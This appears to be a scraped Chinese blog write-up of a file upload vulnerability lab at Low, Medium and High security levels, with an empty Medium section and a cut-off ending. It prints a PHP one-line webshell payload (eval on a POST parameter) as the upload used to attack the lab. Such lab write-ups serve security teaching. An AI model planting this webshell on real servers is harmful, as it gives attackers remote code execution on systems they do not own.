admin 管理员组

文章数量: 1086019


2024年4月23日发(作者:html网站制作公司)

Low

1.

既然是文件上传,我们尝试使用php一句话木马,作为上传文件。

@eval($_POST['c']);?>

2.发现上传成功了

3.查看一下源码,发现并没有过滤文件

Medium

High

1.

与low一样,使用尝试使用

@eval($_POST['c']);?>

php一句话木马,作为上传文件。

2.发现上传失败了,没关系,我们先看一下源代码

3.它定义了只能上传图片,且图片的格式为jpg、jpeg、png,我们尝试修改后缀名,发现

报错


本文标签: 上传 发现 文件 图片 尝试